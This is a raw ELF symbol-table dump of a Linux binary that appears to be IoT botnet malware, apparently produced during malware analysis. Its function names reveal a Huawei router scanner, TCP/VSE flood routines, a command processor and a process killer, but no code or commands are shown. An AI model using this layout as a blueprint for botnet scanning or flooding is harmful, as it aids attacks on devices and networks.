                                                        abort.symtab0x8051440191FUNC<unknown>DEFAULT2
                                                        abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        access.symtab0x804ec5843FUNC<unknown>DEFAULT2
                                                        access.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        acnc.symtab0x804bb8b162FUNC<unknown>DEFAULT2
                                                        add_entry.symtab0x804e25289FUNC<unknown>DEFAULT2
                                                        atoi.symtab0x805187017FUNC<unknown>DEFAULT2
                                                        atol.symtab0x805187017FUNC<unknown>DEFAULT2
                                                        atol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        bcopy.symtab0x805006421FUNC<unknown>DEFAULT2
                                                        bcopy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        been_there_done_that.symtab0x8060f901OBJECT<unknown>DEFAULT12
                                                        brk.symtab0x8054d9444FUNC<unknown>DEFAULT2
                                                        brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        bsd_signal.symtab0x8050418136FUNC<unknown>DEFAULT2
                                                        buf.6699.symtab0x8060dc4440OBJECT<unknown>DEFAULT12
                                                        bzero.symtab0x805007c19FUNC<unknown>DEFAULT2
                                                        bzero.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        c.symtab0x805cad84OBJECT<unknown>DEFAULT11
                                                        calloc.symtab0x8050cb4236FUNC<unknown>DEFAULT2
                                                        calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        checksum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        checksum_generic.symtab0x80481a897FUNC<unknown>DEFAULT2
                                                        checksum_tcp_udp.symtab0x8048209223FUNC<unknown>DEFAULT2
                                                        checksum_tcpudp.symtab0x80482e8223FUNC<unknown>DEFAULT2
                                                        clock.symtab0x804ef7434FUNC<unknown>DEFAULT2
                                                        clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        close.symtab0x805224080FUNC<unknown>DEFAULT2
                                                        closedir.symtab0x8052a40130FUNC<unknown>DEFAULT2
                                                        closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        closenameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        completed.4963.symtab0x805cd001OBJECT<unknown>DEFAULT12
                                                        conn_table.symtab0x8063a784OBJECT<unknown>DEFAULT12
                                                        connect.symtab0x805013c84FUNC<unknown>DEFAULT2
                                                        connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        connectTimeout.symtab0x804a353459FUNC<unknown>DEFAULT2
                                                        crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        csum.symtab0x804a65f168FUNC<unknown>DEFAULT2
                                                        data_start.symtab0x805ca080NOTYPE<unknown>DEFAULT11
                                                        decoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        decodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        dnslookup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        dup2.symtab0x804ec8443FUNC<unknown>DEFAULT2
                                                        dup2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        encoded.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        encodeh.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        encodeq.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        environ.symtab0x80614e44OBJECT<unknown>DEFAULT12
                                                        errno.symtab0x04TLS<unknown>DEFAULT6
                                                        errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        execl.symtab0x8051a14101FUNC<unknown>DEFAULT2
                                                        execl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        execve.symtab0x80528c447FUNC<unknown>DEFAULT2
                                                        execve.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        exit.symtab0x80519b493FUNC<unknown>DEFAULT2
                                                        exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        exp10_table.symtab0x805af60156OBJECT<unknown>DEFAULT4
                                                        fclose.symtab0x8053060380FUNC<unknown>DEFAULT2
                                                        fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        fcntl.symtab0x804eb7b153FUNC<unknown>DEFAULT2
                                                        fd_to_DIR.symtab0x8052ac4136FUNC<unknown>DEFAULT2
                                                        fdgets.symtab0x8049f0b104FUNC<unknown>DEFAULT2
                                                        fdopen_pids.symtab0x8060da04OBJECT<unknown>DEFAULT12
                                                        fdopendir.symtab0x8052bd0108FUNC<unknown>DEFAULT2
                                                        fdpclose.symtab0x8049de3296FUNC<unknown>DEFAULT2
                                                        fdpopen.symtab0x8049bee501FUNC<unknown>DEFAULT2
                                                        fflush_unlocked.symtab0x8054190447FUNC<unknown>DEFAULT2
                                                        fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        fgetc.symtab0x8053f1c145FUNC<unknown>DEFAULT2
                                                        fgetc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        fgetc_unlocked.symtab0x80543ec204FUNC<unknown>DEFAULT2
                                                        fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        fgets.symtab0x8053fc4118FUNC<unknown>DEFAULT2
                                                        fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        fgets_unlocked.symtab0x80544b894FUNC<unknown>DEFAULT2
                                                        fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        findRandIP.symtab0x804a62f48FUNC<unknown>DEFAULT2
                                                        fmt.symtab0x805af4020OBJECT<unknown>DEFAULT4
                                                        fopen.symtab0x805323421FUNC<unknown>DEFAULT2
                                                        fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        fork.symtab0x8051db4524FUNC<unknown>DEFAULT2
                                                        fork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        fork_handler_pool.symtab0x8060f9c1348OBJECT<unknown>DEFAULT12
                                                        fputs_unlocked.symtab0x804fce845FUNC<unknown>DEFAULT2
                                                        fputs_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        frame_dummy.symtab0x80481300FUNC<unknown>DEFAULT2
                                                        free.symtab0x8051294399FUNC<unknown>DEFAULT2
                                                        free.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        fseek.symtab0x805505024FUNC<unknown>DEFAULT2
                                                        fseeko.symtab0x805505024FUNC<unknown>DEFAULT2
                                                        fseeko.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        fseeko64.symtab0x8055068246FUNC<unknown>DEFAULT2
                                                        fseeko64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        fstat.symtab0x8054dc070FUNC<unknown>DEFAULT2
                                                        fstat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        fwrite_unlocked.symtab0x804fd18111FUNC<unknown>DEFAULT2
                                                        fwrite_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        getBuild.symtab0x804d1245FUNC<unknown>DEFAULT2
                                                        getHost.symtab0x804a0ed59FUNC<unknown>DEFAULT2
                                                        getOurIP.symtab0x804cf27509FUNC<unknown>DEFAULT2
                                                        get_hosts_byname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        getc.symtab0x8053f1c145FUNC<unknown>DEFAULT2
                                                        getc_unlocked.symtab0x80543ec204FUNC<unknown>DEFAULT2
                                                        getdents64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        getdtablesize.symtab0x804ecb032FUNC<unknown>DEFAULT2
                                                        getdtablesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        getegid.symtab0x80528f48FUNC<unknown>DEFAULT2
                                                        getegid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        geteuid.symtab0x804ecd08FUNC<unknown>DEFAULT2
                                                        geteuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        getgid.symtab0x80528fc8FUNC<unknown>DEFAULT2
                                                        getgid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        gethostbyname.symtab0x80500f014FUNC<unknown>DEFAULT2
                                                        gethostbyname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        gethostbyname2.symtab0x805010057FUNC<unknown>DEFAULT2
                                                        gethostbyname2.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        gethostbyname2_r.symtab0x80547e4666FUNC<unknown>DEFAULT2
                                                        gethostbyname2_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        gethostbyname_r.symtab0x8056528684FUNC<unknown>DEFAULT2
                                                        gethostbyname_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        gethostname.symtab0x80567d489FUNC<unknown>DEFAULT2
                                                        gethostname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        getpagesize.symtab0x805290419FUNC<unknown>DEFAULT2
                                                        getpagesize.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        getpid.symtab0x80520e049FUNC<unknown>DEFAULT2
                                                        getpid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        getppid.symtab0x804ecd88FUNC<unknown>DEFAULT2
                                                        getppid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        getrlimit.symtab0x804ece043FUNC<unknown>DEFAULT2
                                                        getrlimit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        getsockname.symtab0x805019040FUNC<unknown>DEFAULT2
                                                        getsockname.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        getsockopt.symtab0x80501b856FUNC<unknown>DEFAULT2
                                                        getsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        getuid.symtab0x80529188FUNC<unknown>DEFAULT2
                                                        getuid.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        h_errno.symtab0x44TLS<unknown>DEFAULT6
                                                        hacks.symtab0x805ca204OBJECT<unknown>DEFAULT11
                                                        hacks2.symtab0x805ca244OBJECT<unknown>DEFAULT11
                                                        hacks3.symtab0x805ca284OBJECT<unknown>DEFAULT11
                                                        hacks4.symtab0x805ca2c4OBJECT<unknown>DEFAULT11
                                                        hakai_bp.symtab0x805ca304OBJECT<unknown>DEFAULT11
                                                        hextable.symtab0x8057e801024OBJECT<unknown>DEFAULT4
                                                        hoste.6698.symtab0x8060f7c20OBJECT<unknown>DEFAULT12
                                                        htonl.symtab0x80500b47FUNC<unknown>DEFAULT2
                                                        htons.symtab0x80500a812FUNC<unknown>DEFAULT2
                                                        httphex.symtab0x804bd0e733FUNC<unknown>DEFAULT2
                                                        huawei_scanner.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        huaweiscanner_fake_time.symtab0x805cd684OBJECT<unknown>DEFAULT12
                                                        huaweiscanner_get_random_ip.symtab0x804906e645FUNC<unknown>DEFAULT2
                                                        huaweiscanner_recv_strip_null.symtab0x80483c895FUNC<unknown>DEFAULT2
                                                        huaweiscanner_rsck.symtab0x805cd244OBJECT<unknown>DEFAULT12
                                                        huaweiscanner_rsck_out.symtab0x805cd284OBJECT<unknown>DEFAULT12
                                                        huaweiscanner_scanner_init.symtab0x80484272841FUNC<unknown>DEFAULT2
                                                        huaweiscanner_scanner_kill.symtab0x8048f4027FUNC<unknown>DEFAULT2
                                                        huaweiscanner_scanner_pid.symtab0x805cd204OBJECT<unknown>DEFAULT12
                                                        huaweiscanner_scanner_rawpkt.symtab0x805cd4040OBJECT<unknown>DEFAULT12
                                                        huaweiscanner_setup_connection.symtab0x8048f5b275FUNC<unknown>DEFAULT2
                                                        i.5778.symtab0x805cadc4OBJECT<unknown>DEFAULT11
                                                        index.symtab0x804fe1030FUNC<unknown>DEFAULT2
                                                        inet_addr.symtab0x80500d031FUNC<unknown>DEFAULT2
                                                        inet_aton.symtab0x8054750148FUNC<unknown>DEFAULT2
                                                        inet_aton.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        inet_makeaddr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        inet_ntop.symtab0x80556f2432FUNC<unknown>DEFAULT2
                                                        inet_ntop4.symtab0x805560a232FUNC<unknown>DEFAULT2
                                                        inet_pton.symtab0x805543f459FUNC<unknown>DEFAULT2
                                                        inet_pton4.symtab0x80553c8119FUNC<unknown>DEFAULT2
                                                        initConnection.symtab0x804cdbf360FUNC<unknown>DEFAULT2
                                                        init_rand.symtab0x8049409111FUNC<unknown>DEFAULT2
                                                        init_static_tls.symtab0x8054ad042FUNC<unknown>DEFAULT2
                                                        initfini.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        initstate.symtab0x80515a185FUNC<unknown>DEFAULT2
                                                        initstate_r.symtab0x8051733155FUNC<unknown>DEFAULT2
                                                        ioctl.symtab0x804ed0c139FUNC<unknown>DEFAULT2
                                                        ioctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        isatty.symtab0x80546d427FUNC<unknown>DEFAULT2
                                                        isatty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        kill.symtab0x804ed9843FUNC<unknown>DEFAULT2
                                                        kill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        killer_status.symtab0x805cd904OBJECT<unknown>DEFAULT12
                                                        last_id.6756.symtab0x805cce42OBJECT<unknown>DEFAULT11
                                                        last_ns_num.6755.symtab0x8063a544OBJECT<unknown>DEFAULT12
                                                        libc-cancellation.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        libc-tls.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        listFork.symtab0x804a51e273FUNC<unknown>DEFAULT2
                                                        llseek.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        lseek64.symtab0x805691890FUNC<unknown>DEFAULT2
                                                        macAddress.symtab0x805cd946OBJECT<unknown>DEFAULT12
                                                        main.symtab0x804d1291667FUNC<unknown>DEFAULT2
                                                        main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        makeIPPacket.symtab0x804a7b2126FUNC<unknown>DEFAULT2
                                                        makeRandomStr.symtab0x804a15b103FUNC<unknown>DEFAULT2
                                                        makevsepacket.symtab0x804b618141FUNC<unknown>DEFAULT2
                                                        malloc.symtab0x805052a1928FUNC<unknown>DEFAULT2
                                                        malloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        malloc_trim.symtab0x805142329FUNC<unknown>DEFAULT2
                                                        memcpy.symtab0x804fd8841FUNC<unknown>DEFAULT2
                                                        memcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        memmove.symtab0x804fdb437FUNC<unknown>DEFAULT2
                                                        memmove.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        mempcpy.symtab0x80553a830FUNC<unknown>DEFAULT2
                                                        mempcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        memrchr.symtab0x8054550177FUNC<unknown>DEFAULT2
                                                        memrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        memset.symtab0x804fddc50FUNC<unknown>DEFAULT2
                                                        memset.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        mmap.symtab0x805284427FUNC<unknown>DEFAULT2
                                                        mremap.symtab0x805292059FUNC<unknown>DEFAULT2
                                                        mremap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        munmap.symtab0x805295c43FUNC<unknown>DEFAULT2
                                                        munmap.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        mylock.symtab0x805cb1024OBJECT<unknown>DEFAULT11
                                                        mylock.symtab0x805cb2824OBJECT<unknown>DEFAULT11
                                                        nanosleep.symtab0x80529b161FUNC<unknown>DEFAULT2
                                                        nanosleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        next_start.1451.symtab0x8060dc04OBJECT<unknown>DEFAULT12
                                                        ngPid.symtab0x8063a804OBJECT<unknown>DEFAULT12
                                                        nprocessors_onln.symtab0x8051a7c196FUNC<unknown>DEFAULT2
                                                        ntohl.symtab0x80500c77FUNC<unknown>DEFAULT2
                                                        ntohl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        ntohs.symtab0x80500bb12FUNC<unknown>DEFAULT2
                                                        ntop.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        numpids.symtab0x805cd888OBJECT<unknown>DEFAULT12
                                                        object.4975.symtab0x805cd0424OBJECT<unknown>DEFAULT12
                                                        open.symtab0x805229091FUNC<unknown>DEFAULT2
                                                        opendir.symtab0x8052b4c132FUNC<unknown>DEFAULT2
                                                        opendir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        opennameservers.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        ourIP.symtab0x8063a7c4OBJECT<unknown>DEFAULT12
                                                        p.4961.symtab0x805ca040OBJECT<unknown>DEFAULT11
                                                        parseHex.symtab0x8049f7368FUNC<unknown>DEFAULT2
                                                        parse_config.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        pids.symtab0x8063a884OBJECT<unknown>DEFAULT12
                                                        pipe.symtab0x804edc439FUNC<unknown>DEFAULT2
                                                        pipe.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        poll.symtab0x805685d72FUNC<unknown>DEFAULT2
                                                        poll.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        prctl.symtab0x804edec59FUNC<unknown>DEFAULT2
                                                        prctl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        prefix.6454.symtab0x8059f0412OBJECT<unknown>DEFAULT4
                                                        print.symtab0x80498c5581FUNC<unknown>DEFAULT2
                                                        printchar.symtab0x804969258FUNC<unknown>DEFAULT2
                                                        printi.symtab0x80497a3290FUNC<unknown>DEFAULT2
                                                        prints.symtab0x80496cc215FUNC<unknown>DEFAULT2
                                                        processCmd.symtab0x804bfeb3540FUNC<unknown>DEFAULT2
                                                        program_invocation_name.symtab0x805cbf44OBJECT<unknown>DEFAULT11
                                                        program_invocation_short_name.symtab0x805cbf04OBJECT<unknown>DEFAULT11
                                                        pseudo_cancel.symtab0x80522650NOTYPE<unknown>DEFAULT2
                                                        pseudo_cancel.symtab0x80522bb0NOTYPE<unknown>DEFAULT2
                                                        pseudo_cancel.symtab0x805231b0NOTYPE<unknown>DEFAULT2
                                                        pseudo_cancel.symtab0x805237b0NOTYPE<unknown>DEFAULT2
                                                        pseudo_cancel.symtab0x80523db0NOTYPE<unknown>DEFAULT2
                                                        pseudo_end.symtab0x805228f0NOTYPE<unknown>DEFAULT2
                                                        pseudo_end.symtab0x80522ea0NOTYPE<unknown>DEFAULT2
                                                        pseudo_end.symtab0x805234a0NOTYPE<unknown>DEFAULT2
                                                        pseudo_end.symtab0x80523aa0NOTYPE<unknown>DEFAULT2
                                                        pseudo_end.symtab0x805240a0NOTYPE<unknown>DEFAULT2
                                                        qual_chars.6463.symtab0x8059f1820OBJECT<unknown>DEFAULT4
                                                        raise.symtab0x8052114100FUNC<unknown>DEFAULT2
                                                        raise.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        rand.symtab0x80515005FUNC<unknown>DEFAULT2
                                                        rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        rand.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        rand__str.symtab0x804d861102FUNC<unknown>DEFAULT2
                                                        rand_alpha_str.symtab0x804d8c7114FUNC<unknown>DEFAULT2
                                                        rand_alphastr.symtab0x80495ed165FUNC<unknown>DEFAULT2
                                                        rand_cmwc.symtab0x804952f190FUNC<unknown>DEFAULT2
                                                        rand_init.symtab0x804d7ac77FUNC<unknown>DEFAULT2
                                                        rand_next.symtab0x804d7f9104FUNC<unknown>DEFAULT2
                                                        random.symtab0x805150866FUNC<unknown>DEFAULT2
                                                        random.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        random_poly_info.symtab0x805ab0810OBJECT<unknown>DEFAULT4
                                                        random_r.symtab0x805163495FUNC<unknown>DEFAULT2
                                                        random_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        randtbl.symtab0x805cb54128OBJECT<unknown>DEFAULT11
                                                        rawmemchr.symtab0x805539419FUNC<unknown>DEFAULT2
                                                        rawmemchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        read.symtab0x805235091FUNC<unknown>DEFAULT2
                                                        read_etc_hosts_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        readdir64.symtab0x8052c3c129FUNC<unknown>DEFAULT2
                                                        readdir64.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        realloc.symtab0x8050da0763FUNC<unknown>DEFAULT2
                                                        realloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        recv.symtab0x80501f092FUNC<unknown>DEFAULT2
                                                        recv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        recvLine.symtab0x804a1c2401FUNC<unknown>DEFAULT2
                                                        recvfrom.symtab0x805024c108FUNC<unknown>DEFAULT2
                                                        recvfrom.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        register-atfork.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        resolv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        resolv_conf_mtime.6741.symtab0x8063a704OBJECT<unknown>DEFAULT12
                                                        resolv_domain_to_hostname.symtab0x804d93c125FUNC<unknown>DEFAULT2
                                                        resolv_entries_free.symtab0x804dfa856FUNC<unknown>DEFAULT2
                                                        resolv_lookup.symtab0x804da441380FUNC<unknown>DEFAULT2
                                                        resolv_skip_name.symtab0x804d9b9139FUNC<unknown>DEFAULT2
                                                        rindex.symtab0x805453426FUNC<unknown>DEFAULT2
                                                        rtcp.symtab0x804b14f859FUNC<unknown>DEFAULT2
                                                        sbrk.symtab0x80529f064FUNC<unknown>DEFAULT2
                                                        sbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        scanPid.symtab0x8063a844OBJECT<unknown>DEFAULT12
                                                        select.symtab0x804ee61108FUNC<unknown>DEFAULT2
                                                        select.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        send.symtab0x80502b892FUNC<unknown>DEFAULT2
                                                        send.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        sendSTD.symtab0x804b4aa366FUNC<unknown>DEFAULT2
                                                        sendto.symtab0x8050314108FUNC<unknown>DEFAULT2
                                                        sendto.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        setsockopt.symtab0x805038056FUNC<unknown>DEFAULT2
                                                        setsockopt.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        setstate.symtab0x805154a87FUNC<unknown>DEFAULT2
                                                        setstate_r.symtab0x80517ce161FUNC<unknown>DEFAULT2
                                                        sigaction.symtab0x80527cf80FUNC<unknown>DEFAULT2
                                                        sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        sigaddset.symtab0x80503e034FUNC<unknown>DEFAULT2
                                                        sigaddset.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        sigempty.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        sigemptyset.symtab0x805040420FUNC<unknown>DEFAULT2
                                                        signal.symtab0x8050418136FUNC<unknown>DEFAULT2
                                                        signal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        sigprocmask.symtab0x804eed097FUNC<unknown>DEFAULT2
                                                        sigprocmask.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        sigsetops.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        skip_and_NUL_space.symtab0x805610443FUNC<unknown>DEFAULT2
                                                        skip_nospace.symtab0x80560dc40FUNC<unknown>DEFAULT2
                                                        sleep.symtab0x8052178195FUNC<unknown>DEFAULT2
                                                        sleep.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        socket.symtab0x80503b840FUNC<unknown>DEFAULT2
                                                        socket.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        socket_connect.symtab0x804bc2d225FUNC<unknown>DEFAULT2
                                                        sockprintf.symtab0x8049b50158FUNC<unknown>DEFAULT2
                                                        spec_and_mask.6462.symtab0x8059f2c16OBJECT<unknown>DEFAULT4
                                                        spec_base.6453.symtab0x8059f107OBJECT<unknown>DEFAULT4
                                                        spec_chars.6459.symtab0x8059f7c21OBJECT<unknown>DEFAULT4
                                                        spec_flags.6458.symtab0x8059f948OBJECT<unknown>DEFAULT4
                                                        spec_or_mask.6461.symtab0x8059f3c16OBJECT<unknown>DEFAULT4
                                                        spec_ranges.6460.symtab0x8059f4c9OBJECT<unknown>DEFAULT4
                                                        sprintf.symtab0x804ef9830FUNC<unknown>DEFAULT2
                                                        sprintf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        srand.symtab0x80515f661FUNC<unknown>DEFAULT2
                                                        srandom.symtab0x80515f661FUNC<unknown>DEFAULT2
                                                        srandom_r.symtab0x8051693160FUNC<unknown>DEFAULT2
                                                        stat.symtab0x80568a870FUNC<unknown>DEFAULT2
                                                        stat.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        static_dtv.symtab0x8063514512OBJECT<unknown>DEFAULT12
                                                        static_map.symtab0x8063a1c52OBJECT<unknown>DEFAULT12
                                                        static_slotinfo.symtab0x8063714776OBJECT<unknown>DEFAULT12
                                                        stderr.symtab0x805cc004OBJECT<unknown>DEFAULT11
                                                        stdin.symtab0x805cbf84OBJECT<unknown>DEFAULT11
                                                        stdout.symtab0x805cbfc4OBJECT<unknown>DEFAULT11
                                                        strcasecmp.symtab0x8056d2854FUNC<unknown>DEFAULT2
                                                        strcasecmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strchr.symtab0x804fe1030FUNC<unknown>DEFAULT2
                                                        strchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strchrnul.symtab0x805451825FUNC<unknown>DEFAULT2
                                                        strchrnul.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strcmp.symtab0x804fe3029FUNC<unknown>DEFAULT2
                                                        strcmp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strcoll.symtab0x804fe3029FUNC<unknown>DEFAULT2
                                                        strcpy.symtab0x804fe5027FUNC<unknown>DEFAULT2
                                                        strcpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strcspn.symtab0x805460445FUNC<unknown>DEFAULT2
                                                        strcspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strdup.symtab0x805697448FUNC<unknown>DEFAULT2
                                                        strdup.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strerror_r.symtab0x804ffa4191FUNC<unknown>DEFAULT2
                                                        strlen.symtab0x804fe6c19FUNC<unknown>DEFAULT2
                                                        strlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strncpy.symtab0x804fe8038FUNC<unknown>DEFAULT2
                                                        strncpy.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strnlen.symtab0x804fea824FUNC<unknown>DEFAULT2
                                                        strnlen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strpbrk.symtab0x80546b035FUNC<unknown>DEFAULT2
                                                        strpbrk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strrchr.symtab0x805453426FUNC<unknown>DEFAULT2
                                                        strrchr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strspn.symtab0x805463442FUNC<unknown>DEFAULT2
                                                        strspn.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strstr.symtab0x804fec0197FUNC<unknown>DEFAULT2
                                                        strstr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strtok.symtab0x805009022FUNC<unknown>DEFAULT2
                                                        strtok.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strtok_r.symtab0x805466080FUNC<unknown>DEFAULT2
                                                        strtok_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        strtol.symtab0x805188423FUNC<unknown>DEFAULT2
                                                        strtol.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        sysconf.symtab0x8051b40523FUNC<unknown>DEFAULT2
                                                        sysconf.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        szprintf.symtab0x8049b2c36FUNC<unknown>DEFAULT2
                                                        table.symtab0x8063aa0232OBJECT<unknown>DEFAULT12
                                                        table.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        table_init.symtab0x804dfe0468FUNC<unknown>DEFAULT2
                                                        table_key.symtab0x805cae04OBJECT<unknown>DEFAULT11
                                                        table_lock_val.symtab0x804e1e953FUNC<unknown>DEFAULT2
                                                        table_retrieve_val.symtab0x804e21e52FUNC<unknown>DEFAULT2
                                                        table_unlock_val.symtab0x804e1b453FUNC<unknown>DEFAULT2
                                                        tcgetattr.symtab0x80546f096FUNC<unknown>DEFAULT2
                                                        tcgetattr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                        tcpFl00d.symtab0x804acdd1138FUNC<unknown>DEFAULT2
